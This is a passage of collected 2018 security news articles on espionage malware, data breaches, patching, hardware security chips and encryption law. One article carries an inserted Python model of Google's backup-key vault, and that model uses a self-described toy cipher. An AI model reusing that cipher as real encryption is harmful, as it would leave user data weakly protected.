"We need to stay ahead of bad actors," he said. "We keep shrinking the doorway. They keep trying to get in."


'Operation Oceansalt' Reuses Code from Chinese Group APT1
19.10.2018 securityweek
APT

A recently observed cyber-espionage campaign targeting South Korea, the United States and Canada is reusing malicious code previously associated with state-sponsored Chinese group APT1, McAfee reports.

Exposed in a Mandiant report in 2013 and also known as Comment Crew, APT1 was thought to be a unit of China’s People’s Liberation Army (PLA) and was considered both one of the most persistent of China's cyber threat actors and highly prolific in terms of the quantity of information it had stolen.

The newly observed campaign is unlikely to be the work of APT1, which has remained silent ever since the Mandiant report half a decade ago. Previously, the group had launched cyber-attacks on more than 141 U.S. companies from 2006 to 2010.

Dubbed Oceansalt, the malware implant used in the new campaign shows code similarities with a tool employed by APT1, namely Seasalt. This means that the actor behind the new operation had direct access to Comment Crew’s source code, although it was never made public.

McAfee’s report (PDF) on Oceansalt doesn’t provide a clear answer on who is behind these attacks, but notes that the code overlap could suggest that another group had access to the original code, or that it is a case of code-sharing between actors. Of course, it could also be a “false flag” operation.

McAfee’s security researchers discovered that Oceansalt was launched in five attack waves adapted to the targets.

While the first two attacks were spear-phishing-based and used malicious Korean-language Microsoft Excel documents to download the implant, the third switched to Microsoft Word documents instead. Waves four and five targeted a small number of entities outside of South Korea, including the U.S. and Canada.

During the attacks, the hackers used multiple command and control (C&C) servers, showing that the campaign is active in countries such as Canada, Costa Rica, the United States, and the Philippines.

Oceansalt and Seasalt, McAfee notes, not only contain two identical strings (Upfileer and Upfileok), but also show similarities in their command handlers and index tables, and execute their capabilities in the same way. Furthermore, both use exactly the same response codes to indicate the success or failure of command execution.

Both implants use the same codes for drive and file reconnaissance, and for the creation of reverse-shells (which are based on cmd.exe). Unlike Seasalt, however, Oceansalt uses an encoding and decoding mechanism, and a hardcoded control server address, but employs no persistence method.

According to McAfee, the evidence suggesting code-sharing between the Oceansalt authors and Comment Crew includes the different mechanism for obtaining the C&C IP addresses, the lack of reverse-shell capability in some Oceansalt samples, the presence of debug strings in Oceansalt, and the presence of new functions in one Oceansalt variant.

The implant, the researchers reveal, packs a broad range of capabilities to capture data from the victims’ machines, but it is only a first-stage component, with additional stages downloaded through commands. The malware, however, provides operators with the ability to perform various actions on the system.

Oceansalt includes support for a dozen commands: extract drive information, send information about a specific file, execute a command line using WinExec(), delete file, create file, get information on the running processes, terminate process, create/operate/terminate reverse shell, and test receive and send capabilities.

“Our research shows that Comment Crew’s malware in part lives on in different forms employed by another advanced persistent threat group operating primarily against South Korea. This research represents how threat actors including nation-states might collaborate on their campaigns,” McAfee concludes.


Google Pixel 3 Improves Data Protection with Security Chip
19.10.2018 securityweek
Safety

Google has packed the recently launched Pixel 3 and Pixel 3 XL devices with Titan M, a hardened security microcontroller that can better protect information at hardware level.

Designed and manufactured by Google, Titan M is a second-generation, low-power security module meant to help with the Android Verified Boot, storing secrets, providing backing for the Android Strongbox Keymaster module, and enforcing factory-reset policies.

Courtesy of Insider Attack Resistance, the chip also ensures that no one, not even Google, can unlock a phone or install firmware updates without the owner's cooperation, the Internet search company reveals.

The purpose of including Titan M in Pixel 3 devices was to reduce the attack surface. It is a separate chip, which mitigates entire classes of hardware-level exploits such as Rowhammer, Spectre, and Meltdown, Google claims.

Titan M's processor, caches, memory, and persistent storage are isolated from the rest of the phone’s system, meaning that such side-channel attacks are nearly impossible. Furthermore, the chip includes additional defenses that, alongside its physical isolation, protect against external attacks.

“But Titan M is not just a hardened security microcontroller, but rather a full-lifecycle approach to security with Pixel devices in mind. Titan M's security takes into consideration all the features visible to Android down to the lowest level physical and electrical circuit design and extends beyond each physical device to our supply chain and manufacturing processes,” Google says.

The chip, however, also includes features optimized for the mobile experience, such as low power usage, low-latency, hardware crypto acceleration, tamper detection, and secure, timely firmware updates.

Google says it also created a custom provisioning process for transparency and control at every step of the design process, starting from the earliest silicon stages.

“We know what's inside, how it got there, how it works, and who can make changes,” the company says.

Google also plans on making the Titan M firmware source code publicly available soon. The Internet giant holds the root keys necessary to sign Titan M firmware, but vendors will be able to reproduce binary builds based on the public source.

Titan M features an ARM Cortex-M3 microprocessor hardened against side-channel attacks, as well as hardware accelerators, including AES, SHA, and a programmable big number coprocessor for public key algorithms.

The implementation of Titan M, the company says, is also focused on ensuring that new features, capabilities, and performance that are not readily available in off-the-shelf components can be delivered to users.

“These changes allow higher assurance use cases like two-factor authentication, medical device control, P2P payments, and others that we will help develop down the road,” Google explains.


Apple's Revamped Privacy Website Offers Users Access to Their Data
19.10.2018 securityweek
Apple

Apple users can now get a copy of the data the tech giant has on them, directly from a refreshed and expanded privacy website rolled out this week.

The revamped mini site provides users with easier and faster access to the personal information that Apple keeps, and appears meant to complement a series of new security and privacy features that were included in iOS 12 and macOS Mojave.

As expected, the Cupertino-based iPhone maker voices its commitment to user safety and privacy on the mini site, where it also lists the features that it has included in its products in this regard.

“We’re committed to keeping your personal information safe. That’s why we innovate ways to safeguard your privacy on your device, why we’re up front about how we personalize your experience, and why we equip developers with the best tools to protect your data,” Apple says.

On top of that, the company also provides users with information on how to manage their privacy and what tools they can take advantage of for that. Thus, the privacy-focused website offers details on how users can keep devices, data, and their Apple ID secure, as well as on how they can protect themselves from phishing.

Apple users can also access a Data and Privacy page where a series of dedicated privacy management tools are available. These allow users not only to grab a copy of their data, but also to request a correction to that data, and even deactivate their Apple ID temporarily, or delete their accounts and the data associated with them, permanently.

At the moment, the self-service data and privacy tools are available to users in the United States, the European Union, Australia, Canada, Iceland, Liechtenstein, New Zealand, Norway, and Switzerland.

However, Apple says customers around the world will get access to the same capabilities in the coming months. In the meantime, users in other countries or regions can request a correction to their data or delete their account and associated data, and can also contact Apple to request a copy of their data.

The tech company also reveals that, after conducting a review of its data collection practices, it has decided to include new and updated data and privacy statements in Apple products, “to make it easier than ever to understand how Apple will use your personal information.”

These statements are shown before the user signs in with their Apple ID or turns on any new features that use their data, the company says.

The privacy website also allows users to access a transparency report page, which includes information on the “various forms of legal process requesting information from or actions by Apple.” These range from government requests for locating lost or stolen devices to requests for user data, emergency requests, and requests from private parties in the U.S. seeking customer data.


Open Source Security Management Firm WhiteSource Raises $35 Million
18.10.2018 securityweek
IT

WhiteSource, a company that specializes in open source security management, on Wednesday announced that it raised $35 million in a Series C funding round.

The round was led by Susquehanna Growth Equity, with participation from existing investors 83North and M12 - Microsoft Ventures. The latest funding brings the total raised by the company to date to $46 million.

The company says the money will be used to further increase its reach by opening new sales, marketing and customer support operations in San Francisco and London, along with other locations that will help its global expansion. The firm currently has offices in New York, Boston, and Tel Aviv, Israel.

Founded in 2011, WhiteSource helps organizations use open source software without slowing development or making compromises on security. The company says its Effective Usage Analysis product reduces open source vulnerabilities by 70%.

WhiteSource says its solutions are used by more than 500 organizations of all sizes and from all industries, including nearly a quarter of Fortune 100 companies. Customers include Microsoft, IBM, Comcast and KPMG.

“We are now at a stage where the question is not whether or not to use open source components, but how to put in place the solutions and policies to manage them well,” said Rami Sass, co-founder and CEO of WhiteSource. “Microsoft’s acquisition of GitHub for $7.5B showcases that companies have accepted open source as crucial to the software development process, but incidents such as the Equifax data breach underscore the necessity for all companies to protect their products from attacks that would exploit the open source components they are using.”


How to Check What Facebook Hackers Accessed in Your Account
18.10.2018 securityweek
Social

Could hackers have been able to see the last person you cyberstalked, or that party photo you were tagged in? According to Facebook, the unfortunate answer is "yes."

On Friday, the social network said fewer users were affected in a security breach it disclosed two weeks ago than originally estimated — nearly 30 million, down from 50 million. In additional good news, the company said hackers weren't able to access more sensitive information like your password or financial information. And third-party apps weren't affected.

Still, for users already uneasy about the privacy and security of their Facebook accounts after a year of tumult, the details that hackers did gain access to — gender, relationship status, hometown and other info — might be even more unsettling.

Facebook has been quick to let users check exactly what was accessed. But beyond learning what information the attackers accessed, there's relatively little that users can do — beyond, that is, watching out for suspicious emails or texts. Facebook says the problem has been fixed.

The company set up a website that its 2 billion global users can use to check if their accounts have been accessed, and if so, exactly what information was stolen. It will also provide guidance on how to spot and deal with suspicious emails or texts. Facebook will also send messages directly to those people affected by the hack.

On that page, following some preliminary information about the investigation, the question "Is my Facebook account impacted by this security issue?" appears midway down. It will also provide information specific to your account if you're logged into Facebook.

Facebook said the hackers accessed names, email addresses or phone numbers from these accounts. For 14 million of them, hackers got even more data — basically anything viewable on your account that any of your friends could see, and more. It's a pretty extensive list: user name, gender, locale or language, relationship status, religion, hometown, self-reported current city, birthdate, device types used to access Facebook, education, work, the last 10 places you checked into or were tagged in, your website, people or Pages you follow and your 15 most recent searches.

An additional 1 million accounts were affected, but hackers didn't get any information from them.

The company isn't giving a breakdown of where these users are, but says the breach was "fairly broad." It plans to send messages to people whose accounts were hacked.

Facebook said the FBI is investigating, but asked the company not to discuss who may be behind the attack. The company said it hasn't ruled out the possibility of smaller-scale attacks that used the same vulnerability.

The company said it has fixed the bugs and logged out affected users to reset those digital keys.

Facebook Vice President Guy Rosen said in a Friday call with reporters that the company hasn't ruled out the possibility that other parties might have launched other, smaller scale efforts to exploit the same vulnerability before it was disabled.

Patrick Moorhead, founder of Moor Insights & Strategy, said the breach appeared similar to identity theft breaches that have occurred at companies including Yahoo and Target in 2013.

"Those personal details could very easily be used for identity theft to sign up for credit cards, get a loan, get your banking password, etc.," he said. "Facebook should provide all those customers free credit monitoring to make sure the damage is minimized."

Thomas Rid, a professor at the Johns Hopkins University, also said the evidence, particularly the size of the breach, seems to point to a criminal motive rather than a sophisticated state operation, which usually targets fewer people.

"This doesn't sound very targeted at all," he said. "Usually when you're looking at a sophisticated government operation, then a couple of thousand people hacked is a lot, but they usually know who they're going after."


Branch.io Flaws Exposed Tinder, Shopify, Yelp Users to XSS Attacks
18.10.2018 securityweek
Vulnerability

Hundreds of millions of users may have been exposed to cross-site scripting (XSS) attacks due to a vulnerability present in Branch.io, a service used by Tinder, Shopify, Yelp and many others.

Researchers at vpnMentor were analyzing Tinder and other dating applications when they discovered a Tinder domain, go.tinder.com, that had multiple XSS vulnerabilities.

According to vpnMentor, the flaws could have been exploited to access Tinder users’ profiles. However, it’s worth pointing out that exploiting XSS flaws in most cases requires the target to click on a specially crafted link.

After being notified of the vulnerabilities, Tinder’s security team launched an investigation and determined that the go.tinder.com domain was actually an alias for custom.bnc.lt, a resource of Branch.io.

Branch.io is a California-based company whose solutions help organizations create deep links for referral systems, invitations and sharing links for attribution and analytics purposes.

The affected Branch.io resource is used by several other major companies, including Yelp, Western Union, Shopify, RobinHood, Letgo, imgur, Lookout, fair.com and Cuvva, vpnMentor said.

The VPN company’s researchers estimate that the vulnerabilities may have affected as many as 685 million individuals using the impacted services.

While the security holes have been patched and there is no evidence of malicious exploitation, vpnMentor still believes users should change their passwords as a precaution.

As for the flaw, experts said it was a DOM-based XSS that would have been easy to exploit in many web browsers due to Branch.io’s failure to use a Content Security Policy (CSP).

“[DOM-based XSS] is a type of attack wherein the attack payload is executed as a result of modifying the DOM environment in the victim’s browser, more so in a dynamic environment,” vpnMentor said in a blog post. “In DOM-based XSS, the HTML source code and response of the attack will be exactly the same. This means the malicious payload cannot be found in the response, making it extremely difficult for browser built-in XSS mitigation features like Chrome’s XSS Auditor to perform.”


Tech Giants Concerned About Australia's Encryption Laws
18.10.2018 securityweek
Security

Cyber law changes proposed in Australia specifically state that companies will not be required to implement encryption backdoors, but tech giants are still concerned that the current form of the legislation is too vague and leaves a lot of room for interpretation.

Australia's Telecommunications and Other Legislation Amendment (Assistance and Access) Bill of 2018 aims to compel local and international technology service providers to cooperate with law enforcement and intelligence agencies on investigations into criminal and terrorist activity or face fines of millions of dollars.

The bill wants to give agencies the ability to make three types of requests: a Technical Assistance Request (TAR), which provides a framework for making requests and which includes provisions for compensating firms that provide voluntary assistance; a Technical Assistance Notice (TAN), which compels companies to provide assistance, if they can; and a Technical Capability Notice (TCN), which compels companies to develop new capabilities in anticipation of a future TAN or TAR.

The bill specifically mentions that the goal of the government is not to weaken encryption, but tech giants are still concerned.

The Assistance and Access Bill was introduced to the Parliament's Intelligence and Security Committee on September 20 and comments were accepted until Friday, October 12.

More than 60 submissions were received from both individuals and organizations. Unsurprisingly, law enforcement organizations, such as the Police Federation of Australia, welcome the initiative, and government agencies are trying to convince everyone that encryption will not be weakened.

Australia's Department of Home Affairs claims the new bill "establishes a technologically neutral framework for industry and government to work together towards access solutions with entrenched security protections."

"The new arrangements put in place by the Bill will allow, where possible, Australian authorities exceptional access to encrypted communications in circumstances negotiated by industry and Government. Importantly, any arrangement that would introduce weaknesses and make innocent, third-party communications vulnerable would be in contravention of the Bill’s legal safeguards," the department commented.

Cisco, Apple, Mozilla, Kaspersky Lab and others are still concerned about the bill and its international impact, particularly due to its vagueness and lack of transparency.

Kaspersky Lab has commented on various aspects of the bill, including legal implications.

"By enabling direct access to the foreign users’ machines through the technology provider, rather than through the approved cooperation channels, the Bill may institutionalize circumvention of the standardized procedures of formal mutual legal assistance requests on the grounds of urgency or secrecy," the cybersecurity firm said. "More so, the regulators in jurisdictions where a mutual legal assistance regime with Australia is absent may consider this access to be a violation of a nation’s sovereignty. When served with a notice to access data in those jurisdictions and conceal this action, providers may face a stark choice of which country’s laws they will have to violate."

Cisco is concerned that other governments will follow Australia's example, but they "may not have Australia's commitment to restraint in the exercise of executive power."

"Without further amendment, we believe the net result of these changes would harm the security interests of Australia by setting a precedent that could be adopted by less liberal regimes," Cisco said.

Mozilla warned that "any measure that allows a government to dictate the design of Internet systems represents a significant risk to the security, stability and trust of those systems."

"The bill is intentionally vague on the form and extent of what might be compelled by a TCN, so it is difficult to say what kinds of capabilities might be requested. We wish to emphasize that an under-specified authority to impose technical capabilities onto a software vendor not only introduces substantive problems through insufficient clarity, but also fails to provide certainty for both users and developers of technology," Mozilla said.

Apple says it's willing to help law enforcement investigations, but believes weakening encryption is not necessary. The tech giant wants the law to be clear and unambiguous and include a "firm mandate" that bans the weakening of encryption and other security protections.

"We encourage the government to stand by their stated intention not to weaken encryption or compel providers to build systemic weaknesses into their products. Due to the breadth and vagueness of the bill’s authorities, coupled with ill-defined restrictions, that commitment is not currently being met," Apple noted. "For instance, the bill could allow the government to order the makers of smart home speakers to install persistent eavesdropping capabilities into a person’s home, require a provider to monitor the health data of its customers for indications of drug use, or require the development of a tool that can unlock a particular user’s device regardless of whether such tool could be used to unlock every other user’s device as well. All of these capabilities should be as alarming to every Australian as they are to us."


Web Isolation Firm Garrison Technologies Raises $30 Million
18.10.2018 securityweek
IT

London, UK-based Garrison Technologies has raised £22.9 million (approximately $30 million) in Series B funding, bringing the total raised to £34.9 million (around $50 million at current exchange rates). The funding was led by Dawn Capital, with participation from existing investors IP Group plc, BGF and NM Capital.

This is one of the largest ever funding rounds for a UK cybersecurity firm from UK venture capital, and the largest since Digital Shadows raised $26 million in September 2017. It continues a growing trend for London to be Europe's focus for tech investments. In 2017, UK firms raised £2.45 billion, almost four times more than Germany (£694m) and more than France, Ireland and Sweden combined.

Garrison provides hardware-based web isolation that allows users free and unrestricted -- but secure -- access to the internet. Its product, Silicon Assured Video Isolation technology (Garrison SAVI), converts potentially dangerous web content to a stream of harmless pixels.

"Organizations today recognize the ever-growing threat to their most sensitive data and systems posed simply by allowing employees to browse the web, but until now they've faced an unhappy choice: restrict web access and allow productivity to suffer, or run the risk of exposure to hackers," comments Garrison CEO David Garfield.

"We've designed the world's first truly secure web browser to solve this problem, applying national-security-grade levels of protection to the commercial environment -- at an accessible price point -- in a way that doesn't destroy the user experience as employees go about their work," the company claims.

'National-security-grade', like 'military-grade encryption', is one of those meaningless marketing terms used to impress potential customers. In this case, Garfield could be excused. Garrison was founded in 2014 by David Garfield and Henry Harrison, who previously worked together at national-security specialist Detica plc and subsequently established the Cyber Security business unit at BAE Systems plc. Garrison also includes the UK government among its customers.

"The security industry has long suffered from overblown claims and overinflated prices, without ever ensuring organizations remain truly protected from even some of the most basic threats -- this is particularly true of web browsing security," continued Garfield. "From day one our mission has been developing practical security tools that actually do what they're supposed to."

SAVI is already in use by employees within global blue-chip organizations across the banking, insurance, media, telecoms and legal sectors. "This funding round," said Garfield, "marks a key milestone for our business and will help us to transform the day-to-day security of many thousands more organizations worldwide." The firm says the funds will be used "to expand Garrison's sales and marketing activities, to grow the company's engineering team and to enhance the company's 'safe web browsing as a service' cloud offering."


Microsoft Incompletely Patches JET Database Vulnerability
18.10.2018 securityweek
Vulnerability

An out-of-bounds (OOB) write bug in the Microsoft JET Database Engine that could be exploited for remote code execution has been incompletely addressed with the latest Patch Tuesday security updates, 0patch says.

Tracked as CVE-2018-8423, the flaw was publicly revealed in late September, after Microsoft failed to provide a patch for it in the September 2018 Patch Tuesday set of updates. As 120 days had passed since the vendor was informed of the bug, Trend Micro's Zero Day Initiative (ZDI) shared the information publicly.

It didn’t take long before the first fix arrived. It wasn’t an official update, but a third-party micro-patch developed by 0patch, a community project that aims at resolving software vulnerabilities by delivering tiny fixes to users worldwide.

Last week, Microsoft delivered an official patch for the vulnerability, as part of its October 2018 Patch Tuesday, but it appears that the fix wasn’t complete, and only limited the vulnerability instead of fully addressing it, ACROS Security CEO Mitja Kolsek explains.

The micro-fixes from the community are designed in such a manner that they are immediately replaced by the official patches, when they become available. This is what happened last week as well, when the micro-patch released in late September was replaced by Microsoft’s update.

The bug was found to impact all Windows versions that use two specific variants of the msrd3x40.dll library. What Microsoft did last week was to deliver an entirely new version of that file to all of its users, thus rendering systems vulnerable once again.

The micro-patch is applied to the affected library in memory every time the module is loaded into a running process, and it is matched to the module by its cryptographic hash. Because the DLL was replaced with a new version whose hash is different, the micro-patch ceased to apply after the October 2018 Patch Tuesday update was installed.

According to Kolsek, “Microsoft's October update actually re-opened the CVE-2018-8423 vulnerability for 0patch users who were previously protected by our micropatch.”

This prompted the community to release another fix, which addresses the issue once again for all fully updated 32-bit and 64-bit Windows 10, Windows 8.1, Windows 7, Windows Server 2008 and Windows Server 2012 systems.

“We suspect all other affected Windows versions also share the same version of msrd3x40.dll, in which case the micropatch will apply there as well,” Kolsek notes.

Users who haven’t installed the October patches yet but do have the 0patch Agent installed and did apply the initial micropatch continue to be protected, Kolsek also points out.


Google Boosts Protection of Backups in Android
18.10.2018 securityweek
Android

The latest Android iteration leverages Google Cloud’s Titan technology to better protect users’ backed-up application data, Google says.

The functionality combines Android’s Backup Service and Google Cloud’s Titan technology, ensuring that user privacy is maintained, the Internet giant explains.

Backed-up application data in Android 9 can only be decrypted by a key generated at the client and encrypted using the user's lock-screen PIN/pattern/passcode.

The passcode-protected key material is then encrypted to a Titan security chip in Google’s datacenter, which is configured to release the key only “when presented with a correct claim derived from the user's passcode.”

“Because the Titan chip must authorize every access to the decryption key, it can permanently block access after too many incorrect attempts at guessing the user’s passcode, thus mitigating brute force attacks,” Google reveals.

The Internet search company also says that custom Titan firmware, which cannot be updated without completely erasing the chip, is in charge of strictly enforcing the limited number of incorrect attempts. This should prevent access to a user's backed-up application data without the passcode.
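The following Python model is an added illustration of the flow described above, not Google's code and not part of the original article: the client turns the lock-screen passcode into a claim, the vault stands in for the Titan chip and releases the client-generated backup key only for a correct claim, and it locks the record permanently after too many wrong guesses. The iteration count, attempt budget, account names and the stdlib-only toy stream cipher are assumptions made for the model.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

# Illustrative parameters, constructed for this model; not Google's actual values.
PBKDF2_ITERATIONS = 50_000
MAX_ATTEMPTS = 10


def derive_claim(passcode: str, salt: bytes) -> bytes:
    """Client side: turn the lock-screen passcode into a fixed-length claim.
    The passcode itself never leaves the device; only the claim is presented."""
    return hashlib.pbkdf2_hmac("sha256", passcode.encode(), salt,
                               PBKDF2_ITERATIONS, dklen=32)


def xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher (SHAKE-256 keystream) so the model needs only the
    standard library. A real deployment would use an AEAD such as AES-GCM."""
    stream = hashlib.shake_256(key + nonce).digest(len(data))
    return bytes(a ^ b for a, b in zip(data, stream))


@dataclass
class VaultRecord:
    salt: bytes          # public salt returned to the client at restore time
    claim_hash: bytes    # the chip keeps a hash of the claim, never the passcode
    wrapped_key: bytes   # client-generated backup key, sealed under the claim
    wrap_nonce: bytes
    failures: int = 0
    locked: bool = False


class TitanVault:
    """Models the chip policy the article describes: every key release is
    authorized by the chip, and too many wrong claims lock the record for good.
    Encrypting the record to the chip's own key is abstracted away; the object
    boundary stands in for the chip."""

    def __init__(self) -> None:
        self._records: Dict[str, VaultRecord] = {}

    def enroll(self, account: str, passcode: str, backup_key: bytes) -> None:
        salt = secrets.token_bytes(16)
        claim = derive_claim(passcode, salt)
        nonce = secrets.token_bytes(16)
        self._records[account] = VaultRecord(
            salt=salt,
            claim_hash=hashlib.sha256(claim).digest(),
            wrapped_key=xor_stream(claim, nonce, backup_key),
            wrap_nonce=nonce,
        )

    def salt_for(self, account: str) -> bytes:
        return self._records[account].salt

    def release_key(self, account: str, claim: bytes) -> Optional[bytes]:
        rec = self._records[account]
        if rec.locked:
            return None  # permanently blocked, even for the correct passcode
        if not hmac.compare_digest(hashlib.sha256(claim).digest(), rec.claim_hash):
            rec.failures += 1
            if rec.failures >= MAX_ATTEMPTS:
                rec.locked = True  # irreversible; the real chip enforces this in firmware
            return None
        rec.failures = 0
        return xor_stream(claim, rec.wrap_nonce, rec.wrapped_key)


def client_backup(vault: TitanVault, account: str, passcode: str, app_data: bytes) -> bytes:
    """Device side: generate a fresh backup key, seal it in the vault under the
    passcode claim, and return the encrypted blob that goes to cloud storage."""
    backup_key = secrets.token_bytes(32)
    vault.enroll(account, passcode, backup_key)
    nonce = secrets.token_bytes(16)
    return nonce + xor_stream(backup_key, nonce, app_data)


def client_restore(vault: TitanVault, account: str, passcode: str, blob: bytes) -> Optional[bytes]:
    """New device: derive the claim, ask the vault for the key, decrypt the blob."""
    claim = derive_claim(passcode, vault.salt_for(account))
    backup_key = vault.release_key(account, claim)
    if backup_key is None:
        return None
    return xor_stream(backup_key, blob[:16], blob[16:])


def demo() -> Dict[str, bool]:
    """Constructed walk-through: the right passcode restores the data, the cloud
    blob reveals nothing, and a guessing run exhausts the attempt budget."""
    vault = TitanVault()
    data = b'constructed sample app data: {"notes": "hello"}'
    blob = client_backup(vault, "user@example", "4821", data)
    restored = client_restore(vault, "user@example", "4821", blob)
    for guess in range(MAX_ATTEMPTS):  # guesser tries 0000 .. 0009, all wrong
        client_restore(vault, "user@example", f"{guess:04d}", blob)
    after_lock = client_restore(vault, "user@example", "4821", blob)
    return {"restored": restored == data, "plaintext_in_blob": data in blob,
            "locked_out": after_lock is None}
```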

The setup, Google says, was meant to prevent all unauthorized access to the data, including that of Google employees. The strong security stance this provides has already been verified through a security audit performed by the NCC Group.

The audit, which looked into the Google Cloud Key Vault as a whole, did find issues (including two critical ones in the firmware, both immediately addressed), but concluded that Google has implemented mitigations for a broad range of attack scenarios (including internal threats) right from the design phase.

“NCC Group was impressed by both the well-rounded design and the high-quality code which took security into consideration. Numerous possible avenues of achieving a compromise were investigated and most of these ended with a determination that the design and implementation were already taking the particular attack into account and had sufficient mitigations,” NCC Group notes in their report (PDF).

According to Google, it aims to maintain transparency and openness through external reviews of its security efforts, so that users can feel safe when it comes to their data.

Last week, however, the company proved that it isn’t always as transparent, when it publicly revealed that it learned in March of a vulnerability in one of its APIs that exposed Google+ user data to any application using that API. Google chose not to disclose the issue for over six months.


FDA Warns of Flaws in Medtronic Programmers
18.10.2018 securityweek
Vulnerability

A vulnerability in the software update process of certain Medtronic Programmer models has prompted the vendor to block the functionality on affected devices, the U.S. Food and Drug Administration (FDA) informs.

The flaw was found to impact the Internet connection of Medtronic's Carelink 2090 and Carelink Encore 29901 programmers, and could allow malicious attackers to tamper with the programmers or implanted devices, the FDA reveals.

The programmers are used during implantation and regular follow-up visits for Medtronic cardiac implantable electrophysiology devices (CIEDs) such as pacemakers, implantable defibrillators, cardiac resynchronization devices, and insertable cardiac monitors.

The programmers allow physicians to obtain data from CIEDs (including performance information and battery status) and adjust or reprogram devices, but are also used by Medtronic to deliver software updates to the implanted devices.

The programmer software can be downloaded and updated over the Internet, by connecting to the Medtronic Software Distribution Network (SDN), or by physically plugging a universal serial bus (USB) device into the programmer.

Medtronic has discovered the vulnerabilities in the Internet connection of both Carelink 2090 and Carelink Encore 29901 programmers and has disabled access to the SDN through a software update.

“To remediate these vulnerabilities and enhance cybersecurity of device programmers, Medtronic has disabled access to the SDN. When software updates are needed, a Medtronic representative will manually update, via a secured USB, all CareLink 2090 and CareLink Encore 29901 programmers,” Medtronic notes in a security bulletin (PDF).

Although the programmers use a virtual private network (VPN) to connect to the Medtronic SDN over the Internet, the devices would not verify that they were still connected to the VPN before starting to download software updates.

“To address this cybersecurity vulnerability and improve patient safety, on October 5, 2018, the FDA approved Medtronic's update to the Medtronic network that will intentionally block the currently existing programmer from accessing the Medtronic SDN,” the FDA says.

Now, any attempt to update the programmer over the Internet by selecting the "Install from Medtronic" option will result in error messages such as "Unable to connect to local network" or "Unable to connect to Medtronic."

“To date, there are no known reports of patient harm related to these cybersecurity vulnerabilities,” the FDA’s safety communication reads.

Previously, the United States Department of Homeland Security (DHS) issued an alert on the vulnerabilities in 2090 Programmers in February, revealing that they “may allow an attacker with physical access […] to obtain per-product credentials to the software deployment network.”

“Additionally, successful exploitation of these vulnerabilities may allow an attacker with local network access to influence communications between the Programmer and the software deployment network,” the DHS notes in its alert.


New IBM Security Platform Connects Data, Tools From Several Vendors
18.10.2018 securityweek
Safety

IBM Security on Monday unveiled a new cloud-based platform that combines the company's own capabilities with data, applications and tools from more than a dozen other vendors.

IBM Security Connect, expected to become available in the first quarter of 2019, has been described by IBM as an AI-powered community platform for security applications.

An analysis conducted by the company showed that, on average, cybersecurity teams are using more than 80 cybersecurity tools from 40 different vendors. IBM found not only that many of the capabilities provided by these tools are not used, but also that integration problems can pose a challenge.

IBM Security Connect aims to solve this with a single platform that integrates IBM's own products with data and capabilities provided by 16 other vendors. The list of vendors includes Cisco, Capgemini, Check Point, Carbon Black, CrowdStrike, EY, ForeScout, Forcepoint, Fortinet, McAfee, Qualys, Smarttech, Symantec, Tenable, Trend Micro, and VMware.

IBM and its partners have already created hundreds of apps that are available through the IBM Security App Exchange, but the aforementioned firms have promised to contribute to the development of other integrated applications on the new platform. It's worth noting that the Security App Exchange and other IBM security applications will be housed by the new platform.

IBM says the new platform will be open, with an open development community around it.

IBM Security Connect will initially allow organizations to connect multiple security products and data repositories and automatically federate data in order to allow security teams to prioritize threats and respond.

Additionally, IBM Security Connect will feature expertise from the company's more than 4,000 global security practitioners, and 50 IBM developers will focus on the growth of the community.

“The growth of cybersecurity technology and data combined with a growing skills shortage is creating an unexpected level of complexity for security teams,” said Marc van Zadelhoff, General Manager at IBM Security. “Leveraging the power of the cloud, we can now bring together tools, data and people without expensive customization and integration projects. Data federation through IBM Security Connect helps give security professionals increased security visibility and efficiency without the hassle of migrating data or overly complicated product integrations.”


Feds Investigate After Hackers Attack Water Utility
18.10.2018 securityweek
Attack

Federal and state officials are working with a North Carolina water utility after hackers attacked some of its computer systems.

The head of the Onslow Water and Sewer Authority said in a news release Monday that its internal computer system, including servers and personal computers, was subjected to what was characterized as "a sophisticated ransomware attack."

CEO Jeffrey Hudson said while customer information wasn't compromised in the attack, many other databases have to be recreated. He added that the FBI, the Department of Homeland Security and the state of North Carolina have been called in.

Hudson said the utility began experiencing virus attacks from a malware system on Oct. 4. He said it was believed the virus was brought under control, but security specialists were called when the problem persisted.

Last December, Mecklenburg County computer systems were hacked and local leaders refused to pay a hacker $23,000 to unlock data on county servers frozen by malicious software. The computers handled the collection of property taxes, building permits and the processing of jail inmates. Technology workers made digital repairs with backed-up data.

In March, the city of Atlanta's computer network was the victim of a ransomware cyberattack. A city spokeswoman said the attack was discovered by the city's information security team, which noticed "something that looked peculiar" on the server and began investigating.

Also in March, a ransomware attack hit Baltimore's 911 dispatch system, prompting a roughly 17-hour shutdown of automated emergency dispatching. The Colorado Department of Transportation suffered two attacks a month earlier.


Russia-Linked Hackers Target Diplomatic Entities in Central Asia
18.10.2018 securityweek
BigBrothers

Cybersecurity companies have been monitoring the activities of a threat group that focuses on espionage campaigns aimed at diplomatic entities in Central Asia.

Earlier this month, ESET detailed the threat actor's operations, which it tracks as Nomadic Octopus, at the Virus Bulletin conference. On Monday, Kaspersky also published a blog post covering some of the group's attacks and tools.

According to Kaspersky, which tracks the group as DustSquad, the hackers appear to speak Russian.

Anton Cherepanov, the ESET senior malware researcher who detailed Nomadic Octopus at Virus Bulletin, confirmed for SecurityWeek that the hackers may speak Russian based on the spear-phishing emails they send out and the use of Russian malware filenames.

ESET, which says the threat actor is very persistent, has identified only one type of malware used by Nomadic Octopus and has found evidence that the group has been active since at least 2015.

Kaspersky, however, has discovered both Windows and Android malware, and identified a campaign that dates as far back as 2014. The cyberspies appear to be focusing on private individuals and diplomatic entities in Central Asia, mostly former Soviet Union countries and Afghanistan.

In April 2018, researchers at Kaspersky discovered a new sample of DustSquad's Windows malware, which they are tracking as Octopus. The malware had been disguised as the Telegram messaging application, specifically a Russian version that appeared to have been used by the Democratic Choice (DVK) opposition party in Kazakhstan. The fake app emerged just as Kazakhstan had threatened to block Telegram over its use by the DVK.

DustSquad uses the Delphi programming language to develop its Octopus Trojan, the same as Sofacy's Zebrocy malware. While both DustSquad and Sofacy have been linked to Russia and malware from both groups was found on compromised machines, Kaspersky believes the threat actors are not related.

An analysis of the Octopus malware's different components revealed some apparently unfinished functionality. However, experts believe that the malware was actually created in a hurry and its developers decided not to implement certain capabilities.

Once it infects a system, the malware gives attackers remote access to the targeted machine, including the ability to execute commands, upload and download files, take screenshots, and search for RAR archives.

